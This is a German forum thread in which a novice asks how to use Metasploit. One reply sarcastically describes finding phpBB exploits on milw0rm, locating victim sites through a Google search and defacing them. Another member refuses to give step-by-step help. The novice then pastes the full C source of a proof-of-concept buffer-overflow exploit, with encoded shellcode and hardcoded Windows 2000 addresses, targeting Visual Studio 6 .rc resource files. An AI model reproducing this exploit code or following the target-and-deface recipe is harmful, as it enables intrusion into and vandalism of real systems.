Metasploit

Hallo,
ich habe letztens das Metasploit Projekt entdeckt. Wie ich hörte sollen das schon fertige Exploits sein mit dem man ohne groß backdoors schreiben loshacken kann. Ich hab mirs gezogen aber ich check da voll nix. Kennt sich damit jmd aus? Wenn ihr nicht hier schreiben wollt Icq: 242370455

^^

Geh auf www.milw0rm.org

Klick suchen

Geb iergendeine Software ein

z.b. phpbb

Dann suchste dir nen Exploit raus

Dann gehen wir auf www.google.de

Wir fügen in die Suche "Inurlhpbb" ein

Jetzt klicken wir mal den ersten Link an

Und probieren nun unseren Exploit aus

Klappt nicht?Macht nix auf zur nächsten Seite

Wenn der Exploit klappt hacken wir mal den Admin


Jetzt logen wir uns ein und schreiben z.b. in den News

"Hacked by dddd PWNED"

Jetzt bist du ultra 1337 weil du hast voll die Seite gehackt

Na dann hack mal los.....

Danke kann jetzt jmd was hilfreiches schreiben? Wie genau starte ich Metasploit bzw. wie wende ich es an?

Hier:
http://www.syngress.com/book_catalog/327_SSPC/sample.pdf
Bezieht sich aber auf Version 2, nicht 3.

Auf der Metasploit Seite sind auch noch pdfs.

Eigentlich hast du Glück und solltest dich zufrieden schätzen mit dem was dragonelf geschrieben hat!

Laut Zonenregeln ist es nähmlich verboten, damit schadest du nähmlich den Angehörigen!








mfg :victory:

8oo73l2 schrieb:

Eigentlich hast du Glück und solltest dich zufrieden schätzen mit dem was dragonelf geschrieben hat!

Laut Zonenregeln ist es nähmlich verboten, damit schadest du nähmlich den Angehörigen!








mfg :victory:

Zum Vergrößern anklicken....

Daran ist genau gar nichts verboten.

Danke für den link aber gibts sowas auch auf deutsch?

Wieso brauchst du deutsche Exploits?

Also klick oben Search

Und dann gibste dein Script ein fuer das du einen Exploit willst

Es gibt keine "deutschen exploits"

Die sind alle Englisch

Ich meinte die PDF-Datei war in englisch geschrieben...

Und ich rede von Metasploit und nicht von milmw0rm

dddd schrieb:

Danke für den link aber gibts sowas auch auf deutsch?

Zum Vergrößern anklicken....

Nein, in diesen Bereichen muss man einfach Englisch können.

Mr. Q du scheinst Metasploit zu kennen...

Du kannst mir ja mal kurz auf deutsch erzählen was man da schritt für schritt tun muss.
1. denk ich mal mfsweb öffnen...
2....
3....??

dddd schrieb:

Mr. Q du scheinst Metasploit zu kennen...

Du kannst mir ja mal kurz auf deutsch erzählen was man da schritt für schritt tun muss.
1. denk ich mal mfsweb öffnen...
2....
3....??

Zum Vergrößern anklicken....

Das macht er doch gerne und mit Freude^^

dddd schrieb:

Mr. Q du scheinst Metasploit zu kennen...

Du kannst mir ja mal kurz auf deutsch erzählen was man da schritt für schritt tun muss.
1. denk ich mal mfsweb öffnen...
2....
3....??

Zum Vergrößern anklicken....

Hör mal zu:
Du kannst anscheinend nichtmal Englisch. Die Chance, dass du von der Materie irgendetwas verstehen könntest sind bei 0.

Wenn dich das wirklich interessiert (was ich bezweifle) dann mach folgendes:
.) Lerne Englisch
.) Lerne C/C++
.) Verstehe TCP/IP
.) Lerne über Buffer, Buffer Overflows, Stacks, Speicheradressen, Variablen, die Speicherverwaltung,...
.) Lerne wenigstens die Grundzüge von x86 Assembly

...und DANN reden wir weiter. Bzw: Dann brauchen wir nichts mehr reden, weil du es verstehen wirst.

Aber einfach nur so mit Klicki-Klicki is nicht.
Kiddie Zirkus...

MR.Q schrieb:

Hör mal zu:
Du kannst anscheinend nichtmal Englisch. Die Chance, dass du von der Materie irgendetwas verstehen könntest sind bei 0.

Wenn dich das wirklich interessiert (was ich bezweifle) dann mach folgendes:
.) Lerne Englisch
.) Lerne C/C++
.) Verstehe TCP/IP
.) Lerne über Buffer, Buffer Overflows, Stacks, Speicheradressen, Variablen, die Speicherverwaltung,...
.) Lerne wenigstens die Grundzüge von x86 Assembly

...und DANN reden wir weiter. Bzw: Dann brauchen wir nichts mehr reden, weil du es verstehen wirst.

Aber einfach nur so mit Klicki-Klicki is nicht.
Kiddie Zirkus...

Zum Vergrößern anklicken....

Also Metasploit ist wirklich einfach zu bedienen.
Die Console lässt einem viele Möglichkeiten .
Zur Not geht msfweb auch.
Manche Tools sind nur für Console man kann damit neue Exploits entwickeln,
Asembler Shellcode ist ja vorhanden, leider erkennen die meistens guten IDS /IPS diesen,
also ist angesagt diesen zu modifizieren wenn man nicht entdeckt werden will.
Metasploit 2 ist in Perl geschrieben und wird nicht mehr weiterentwickelt,
Metasploit 3 ist in Ruby neu geschrieben,
was das System meiner meiner nach langsamer macht,
ich stehe auf Perl, es gibt trotzdem noch die Möglichkeit neue Exploits für Metasploit 2 zu entwickeln.
HD Moore ist schon ein begabter Hacker genau wie Fyodor (wer sagt das Hacker keine Tools benutzen liegt falsch, sie passen sie nur nach Bedarf an).

Thunderbird schrieb:

Also Metasploit ist wirklich einfach zu bedienen.
[...]

Zum Vergrößern anklicken....

Schön, nur solltet man auch verstehen was man tut und was es bewirkt.
Eine Schritt-für-Schritt Anleitung werde ich hier sicher nicht schreiben bzw unterstützen.

Okay n stück hab ich schon verstanden. Also ich hab jetzt mal n Exploit geschrieben in C++ und das mit Eclipse unter Linux... naja xD jetzt weiß ich auch nicht weiter PWNED

#include "stdio.h"
#include "stdlib.h"
#include "memory.h"

#define STR01 "Microsoft Visual Studio 6.0 SP6 .rc PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 283
#define DEC_CODE 0xBC
#define DEC_CODE_OFFSET 0x2D
#define ENC_SIZE_OFFSET 0x3E
#define SHIFT 0x40
#define SHIFT_DEC_OFFSET 0x35
#define PROC_NAME_OFFSET 0x107
#define GETSTAR_OFFSET 0x11
#define CREPRO_OFFSET 0x6d
#define GETWINDIR_OFFSET 0x25
#define ESPSUB_OFFSET 0x08
#define FNAMSHIFT_OFFSET 0x02

typedef struct
{
unsigned int getStarInf;
unsigned int crePro;
unsigned int getWinDir;
unsigned int jmpEspPtr;
}ApiPtrs;

ApiPtrs osApiPtrs[2]=
{
0x7c4f49df,0x7c4fc0a0,0x7c4e9c00,0x782f28f7,
0x7c596b7a,0x7c595010,0x7c592d23,0x77e16280
};

unsigned char decoder[]=
{
0xeb,0x2a,0xeb,0x2a,0x8b,0xdc,0x81,0xc3,
0x40,0xff,0xff,0xff,0x8b,0xcb,0x33,0xd2,
0x8a,0x21,0x80,0xfc,0xbc,0x75,0xe9,0x41,
0x8a,0x21,0x80,0xec,0x40,0x88,0x23,0x43,
0x41,0x42,0x33,0xc0,0xb0,0x99,0x3b,0xd0,
0x7c,0xe6,0xeb,0xd6,0xeb,0xef
};

unsigned char shlCode[]=
{
0x83,0xc4,0x0c,0x8b,0xc4,0x8b,0xe6,0x90,
0x90,0x90,0x50,0x66,0x2d,0x10,0x20,0x50,
0xb8,0x7a,0x6b,0x59,0x7c,0xff,0xd0,0x5b,
0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,
0xeb,0x10,0x30,0x53,0xb8,0x23,0x2d,0x59,
0x7c,0xff,0xd0,0x58,0x50,0x66,0x2d,0x10,
0x30,0x32,0xdb,0x38,0x18,0x74,0x03,0x40,
0xeb,0xf9,0x5b,0x53,0xb2,0xff,0xb1,0x5c,
0x88,0x08,0x40,0x38,0x13,0x74,0x08,0x8a,
0x0b,0x88,0x08,0x43,0x40,0xeb,0xf4,0xb2,
0x00,0x88,0x10,0x58,0x50,0x66,0x2d,0x10,
0x30,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x10,
0x20,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,
0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x59,
0x7c,0xff,0xd0,0xeb,0xfe
};

unsigned char jmp1Seq[]=
{
0xe9,0x2d,0xff,0xff,0xff
};

unsigned char jmp0Seq[]=
{
0xe9,0x28,0xff,0xff,0xff
};

unsigned char espSub0=0x4e;
unsigned char espSub1=0x5c;
unsigned char fnamShift0=0x0e;
unsigned char fnamShift1=0x1c;
unsigned char retOffset1=0xe7;
unsigned char retOffset0=0xf5;
unsigned char jmp1Offset=0xeb;
unsigned char jmp0Offset=0xf0;
unsigned short back3=0xf5eb;
unsigned char back3Offs=0xf9;

unsigned char buf0[EXPL_SIZE];
char *outName;
int osId;
int defProc;
unsigned char espSub;
unsigned char fnamShift;
unsigned char *jmpSeq;
unsigned char retOffset;
unsigned char jmpOffset;



int Encode(unsigned char *destBuf, unsigned char *srcBuf, int srcSize)
{
int cnt,c1;

for(cnt=0,c1=0;cnt<srcSize;cnt++)
{
if((srcBuf[cnt]<0x20)||(srcBuf[cnt]==0x22)||(srcBuf[cnt]==0x2f))
{
destBuf[c1]=DEC_CODE;
destBuf[c1+1]=srcBuf[cnt]+SHIFT;
c1+=2;
}
else
{
destBuf[c1]=srcBuf[cnt];
c1++;
}
}

return c1;
}

void CompileBuffer()
{
int ptr=0;
int encSiz;

memset(buf0,'1',EXPL_SIZE);
ptr+=sprintf((char*)buf0,"1 TYPELIB MOVEABLE PURE \"");

decoder[ESPSUB_OFFSET]=espSub;

memcpy(buf0+ptr,decoder,sizeof(decoder));
buf0[DEC_CODE_OFFSET]=DEC_CODE;
buf0[SHIFT_DEC_OFFSET]=SHIFT;
ptr+=sizeof(decoder);

*((unsigned int*)(shlCode+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;
*((unsigned int*)(shlCode+CREPRO_OFFSET))=osApiPtrs[osId].crePro;
*((unsigned int*)(shlCode+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;

shlCode[FNAMSHIFT_OFFSET]=fnamShift;

encSiz=Encode(buf0+ptr,shlCode,sizeof(shlCode));
buf0[ENC_SIZE_OFFSET]=sizeof(shlCode);

sprintf((char*)(buf0+PROC_NAME_OFFSET),"%s\xff",DEF_SPAWNED_PROCESS);
buf0[PROC_NAME_OFFSET+sizeof(DEF_SPAWNED_PROCESS)]=0xff;

*((unsigned int*)(buf0+retOffset))=osApiPtrs[osId].jmpEspPtr;
memcpy(buf0+jmpOffset,jmpSeq,5);

if(osId==0)
{
*((unsigned short*)(buf0+back3Offs))=back3;
}

sprintf((char*)(buf0+EXPL_SIZE-3),"\"\r\n");

printf("Exploit buffer compiled\n");
}

void WriteBuffer()
{
FILE *o;

o=fopen(outName,"wb");
if(o==NULL)
{
printf("Cannot open file for writing\n");
exit(0);
}

fprintf(o,"//**********\r\n// %s\r\n//**********\r\n\r\n",STR01);
fwrite(buf0,EXPL_SIZE,1,o);
fclose(o);

printf("Output .rc file [ %s ] built successfully\n",outName);
}

void ProcessInput(int argc, char* argv[])
{
printf("\nMicrosoft Visual Studio 6 .rc resource files exploit\n");
printf("Vulnerability found & exploit built by porkythepig\n");

if(argc<3)
{
printf("Syntax: exploit.exe os outName\n");
printf("[os] host OS, possible choices:\n");
printf(" 0 Windows 2000 SP4 English\n");
printf(" 1 Windows 2000 SP4 English all updates on day 11.01.2007\n");
printf("[outName] output .rc exploit file name\n");
exit(0);
}

osId=atol(argv[1]);
if((osId<0)||(osId>1))
{
exit(0);
}

if(osId==0)
{
espSub=espSub0;
fnamShift=fnamShift0;
jmpSeq=jmp0Seq;
jmpOffset=jmp0Offset;
retOffset=retOffset0;
}
else
{
espSub=espSub1;
fnamShift=fnamShift1;
jmpSeq=jmp1Seq;
jmpOffset=jmp1Offset;
retOffset=retOffset1;
}

outName=argv[2];
}

int main(int argc, char* argv[])
{

ProcessInput(argc,argv);
CompileBuffer();
WriteBuffer();

return 0;
}


Was haltet ihr davon?

Erstes hast den nicht du geschrieben und zweitens ist das ein eigenständiger Exploit in C. Ich dachte du wolltest mit einem Exploition Framework (wie Metasploit) arbeiten?

Und was hast du denn verstanden?

Natürlich hab ich den Exploit geschrieben (oder eben kopiert)....
Dann hab ich aus ihm ein Programm gemacht und wollte den mit Metasploit einsetzen